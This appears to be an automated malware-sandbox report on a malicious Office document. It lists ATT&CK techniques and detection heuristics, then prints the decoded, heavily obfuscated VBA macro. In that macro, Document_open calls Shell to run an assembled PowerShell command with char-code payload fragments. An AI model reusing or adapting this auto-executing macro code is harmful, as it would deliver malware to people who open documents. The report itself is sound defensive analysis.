Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristics 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the 'Document_Open' macro uses the Shell() function to execute commands, a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Doc.Malware.Valyria-6803403-0' further supports the malicious verdict.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6803403-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6803403-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16057 bytes |

SHA-256 (macros.bas): 3972cebc9a514bd96b3a6395f12ae20c9bacee25b0000af7f97f107d5d536e01
Preview of script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "fptvwWSGzM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zAXCqIZhp()
On Error Resume Next
XdOAEU = 35047 + WEFPVq + (70562 * CDbl(lVaCi) - oLKITf / CSng(18777) - ClZIj / Hex(jdQrui) + 46586 - 62600)
ulGpL = rtUqii
Ebzup = pwAmj - BTqNG / 73978 / IFiHwF - 223327908 + Hex(KlSRZ) * WhhzKo - Round(17192)
ZqBGX = Sqr(67019)
QVUBph = 87223 + djNtv + (39606 * CDbl(tDRdNV) - sztwcc / CSng(3339) - WFFwQM / Hex(Izbjiq) + 14181 - 90948)
nUqICG = hjcuUj
TEfcVI = EQCoMH - zDYQuR / 4210 / mukDkm - 223327908 + Hex(jLPtO) * rkkHzJ - Round(43708)
LKwpZ = Sqr(55952)
qSlrRX = 8291 + kqYStB + (14842 * CDbl(oIuIf) - GsqQP / CSng(49520) - Jmlia / Hex(ZzsqcE) + 71063 - 65449)
jCunV = GXZiL
jCIfM = BAHiZb - nkSFi / 36800 / SSEucQ - 223327908 + Hex(OWwUZ) * WBjRQM - Round(13433)
icuTFn = Sqr(65980)
RwOCvi = 76242 + LJzAil + (7552 * CDbl(oVMGc) - diWjXW / CSng(89562) - wFpYji / Hex(ORcCL) + 17928 - 31522)
pUaLGk = rbOWUl
HfVTU = jPHRjd - uLJBV / 95856 / EjDQoN - 223327908 + Hex(QdRiU) * zzJCP - Round(27223)
FCFna = Sqr(48991)
zAXCqIZhp = PNJokQuhhl + VBA.Shell(cwiTROBCw + Chr(KGciWbF + vbKeyP + zzoiCSzFcYk) + "owers" + YLKFj + djdRiq + pvTWkbwGk + ENrQsnqaKVz + HVRHPCRn, 25149 - 25149)
zwYcEf = 12662 + PlpjP + (40092 * CDbl(wCGlH) - rBORpI / CSng(16557) - VkOQr / Hex(BZjwk) + 14568 - 27501)
iCUlb = ESusDS
slRKC = vJLPX - EtBbTY / 22302 / XVIBz - 223327908 + Hex(YljPd) * RjdwwF - Round(78643)
QfCLL = Sqr(83033)
ziwXdP = 20847 + iJZvma + (62588 * CDbl(QDiNj) - GHzap / CSng(81384) - AWffp / Hex(mlGVhu) + 97072 - 36382)
FQViM = JYOEj
ZVDpX = XCaUni - uQwctk / 19516 / zTlrKQ - 223327908 + Hex(iCNOr) * FKlIP - Round(88693)
qZwmdn = Sqr(16502)
End Function
Private Sub Document_open()
On Error Resume Next
cCSwMa = 97074 + XHZrc + (78971 * CDbl(KTiqb) - qtaGC / CSng(38879) - isdLt / Hex(cHTKCT) + 68812 - 87643)
SGZKkI = JzJjDw
FMWOlJ = rKGiui - NwvMwr / 18793 / WsVHap - 223327908 + Hex(WNLpC) * wWTqw - Round(52014)
SltfHD = Sqr(78526)
dpisdi = 5925 + otXEbE + (27987 * CDbl(cVzQrk) - rWDlR / CSng(35123) - SFsWvJ / Hex(bMQXoC) + 38500 - 57036)
rNAzE = XvkuFz
psjnVa = lLCaRM - JFjAJ / 68240 / ChpNcb - 223327908 + Hex(Hwdtz) * hCdEF - Round(74254)
ckJTIY = Sqr(12153)
zAXCqIZhp
omLqZ = 86154 + wiNZhR + (1937 * CDbl(HciuW) - GZhwB / CSng(89637) - aDOVd / Hex(XurmfN) + 77732 - 43358)
mcztM = WaEkHP
bFMtG = MduYws - azEDp / 57290 / Qpzhiu - 223327908 + Hex(KHkHNH) * bIIkW - Round(79665)
PZLuj = Sqr(96688)
mGfLL = 67530 + VJRkl + (27178 * CDbl(qwTSou) - zsSmt / CSng(33403) - mcBKmE / Hex(BdZKGj) + 84085 - 67908)
NsGOvA = QVHFDU
OazoNM = SRHjj - ZzJIp / 36470 / IiOLND - 223327908 + Hex(cGiVNo) * wMFBn - Round(31816)
iJmiZZ = Sqr(78147)
End Sub
Attribute VB_Name = "soZIDaE"
Function YLKFj()
On Error Resume Next
uwDMuI = dRplWj
VZhMb = Sqr(48979)
mfwnrs = 54710 + Pfslm + (32014 * CDbl(EOLQSR) - CXwGTo / CSng(8110) - hvZcNZ / Hex(zjNVci) + 46560 - 39541)
OPJda = kZnNcw - MKCWIQ / 55092 / wptdD - 223327908 + Hex(ltGrMH) * KNEwVG - Round(97071)
iMCaCbDSkGc = "HeLL " + " . ( $EnV:Com" + "SPEc[4,15,25]" + "-JoiN'') ( -J"
hOGaYw = XLEKw
pkRuNY = Sqr(72096)
RZQzX = 7568 + jjWQqG + (3793 * CDbl(wZnKiP) - bnDfr / CSng(51090) - vmBLn / Hex(nozzCz) + 14229 - 748)
zSnBw = vrMYKl - OfSIKK / 55166 / IfHPjz - 223327908 + Hex(NzNzJ) * Bszro - Round(21983)
wihtHWsO = "OI" + "N ((" + "46 , 80 , 90 " + ",105 , 10" + "7, 73,42, 55,4" + "2 , " + "100, 111,125"
FpazO = aEzlD
bbOkn = Sqr(88958)
Ibrnf = 73812 + iciOL + (24158 * CDbl(NMmTRV) - bjSEKA / CSng(53970) - OOMJj / Hex(vKETF) + 48928 - 62710)
SfUhO = rYiVlm - NQCCc / 50788 / ChzLw - 223327908 + Hex(BIrqZ) * hIwir - Round(54540)
hVdWjisBzvz = ", 39," + " 101,104" + ", 96," + " 11" + "1, 10" + "5, 126,42 , 12"
TDmVw = mYMKY
mVEdC = Sqr(88987)
HMbLk = 62519 + kwjih + (85785 * CDbl(YFzQiK) - IHOPM / CSng(2144) - JtpwSd / Hex(AFwMB) + 68
```

... (truncated)